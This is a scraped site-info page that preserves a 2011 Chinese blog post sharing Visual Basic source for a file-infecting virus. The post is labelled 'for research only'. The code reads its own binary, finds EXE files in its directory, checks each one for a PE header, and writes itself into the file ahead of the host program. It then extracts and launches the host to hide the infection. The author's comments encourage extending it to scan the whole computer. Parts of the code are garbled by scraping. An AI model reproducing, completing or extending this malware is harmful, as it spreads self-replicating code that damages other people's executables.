gontnet.net
未注册HTTP/1.1 200 OK 连接:关闭 访问时间:2011年07月05日 15:38:10 服务器:Microsoft-IIS/6.0 语言环境:ASP.NET 语言环境:PHP/5.2.13 X-Pingback: http://www.gontnet.net/xmlrpc.php 类型:text/html; charset=UTF-8 网站编码:UTF-8
该域名无法解析为IP
心灵空间 感觉可以用文字所描述 跳至正文 首页JS 正则表达式 VB病毒代码——只共研究使用 发表于 2011年06月4日 由 admin Option Explicit Private Victim As String ‘要感染的文件的名字 Private HostLen As Long ‘要感染的文件的大小 Private vbArray() As Byte ‘病毒的代码 Private hArray() As Byte ‘要感染的文件的代码 Private lenght As Long Private MySize As Integer ‘病毒的大小 Private Declare Function OpenProcess Lib “kernel32″ (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long Private Declare Function GetExitCodeProcess Lib “kernel32″ (ByVal hProcess As Long, lpExitCode As Long) As Long Private Declare Function CloseHandle Lib “kernel32″ (ByVal hObject As Long) As Long Private iResult As Long Private hProg As Long Private idProg As Long Private iExit As Long Const STILL_ACTIVE As Long = &H103 Const PROCESS_ALL_ACCESS As Long = &H1F0FFF Private Sub form_Initialize() Dim i As Long On Error GoTo vbVerror ‘出错处理 ‘原理:将生成病毒文件的代码读出,粘在要被感染的文件的后面。 Open App.Path & “\” & App.EXEName & “.exe” For Binary Access Read _ As #1 ReDim MyArray(LOF(1) – 1) MySize = LOF(1) ReDim vbArray(MySize) Get #1, 1, vbArray Close #1 ‘这是在读自己的代码 Victim = Dir(App.Path & “\” & “*.EXE”) ‘随便选一个文件(目前只是在病毒所在的目录下随机选一个,将来你可以修改,让它不断的循环搜索计算机上的所有文件。) While Victim If format(Victim, “>”) ”) Then Open App.Path & “\” & Victim For Binary Access Read As #1 ReDim hArray(LOF(1)) Get #1, 1, hArray Close #1 ‘读出病毒自身的代码 If hArray(&H69) i = hArray(&H3C) If hArray(i) = &H50 Then Open App.Path & “\” & Victim For Binary Access Write As #1 Put #1, , vbArray Put #1, MySize, hArray Close #1 End If ‘要保证被感染的不是空文件(不是圈套) End If End If ‘读出准备被感染的文件的代码 Victim = Dir() ‘Next Wend ‘下面的工作是为了保证病毒不会重复感染一个文件,也不会自我感染。 Open App.Path & “\” & App.EXEName & “.exe” For Binary Access Read As #1 lenght = LOF(1) – MySize If lenght ReDim vbArray(lenght – 1) Get #1, MySize, vbArray Close #1 Open App.Path & “\” & App.EXEName & “.eve” For Binary Access Write As #1 Put #1, , vbArray Close #1 idProg = Shell(App.Path & “\” & App.EXEName & “.eve”, vbNormalFocus) hProg = OpenProcess(PROCESS_ALL_ACCESS, False, idProg) GetExitCodeProcess hProg, iExit Do While iExit = STILL_ACTIVE DoEvents GetExitCodeProcess hProg, iExit Loop Kill App.Path & “\” & App.EXEName & “.eve” Else Close #1 End If End vbVerror: ‘出错处理,空着就可以了 End Sub [/hide] ‘还有其他的说明: ’1、本代码目前仅是实验模型,给新手讲解原理之用,不会失控,绝对安全。 ’2、本代码仅实现了感染EXE的功能,其他的功能还须你自己加入。 ’3、为了目前的安全,本病毒只是在病毒所在的目录下随机选一个文件感染,你可以利用此功能来调试;将来你可以修改,让它不断的循环搜索计算机上的所有文件。 ’4、最重要的:不要搞恶意破坏,否则真进了监狱后果自负! 发表在 未分类 | 留下评论 Hello world! 发表于 2011年06月3日 由 admin 欢迎使用 WordPress 。这是系统自动生成的演示文章。编辑或者删除它,开始您的博客!
© 2010 - 2020 网站综合信息查询 同IP网站查询 相关类似网站查询 网站备案查询网站地图 最新查询 最近更新 优秀网站 热门网站 全部网站 同IP查询 备案查询
2026-01-08 21:29, Process in 0.0042 second.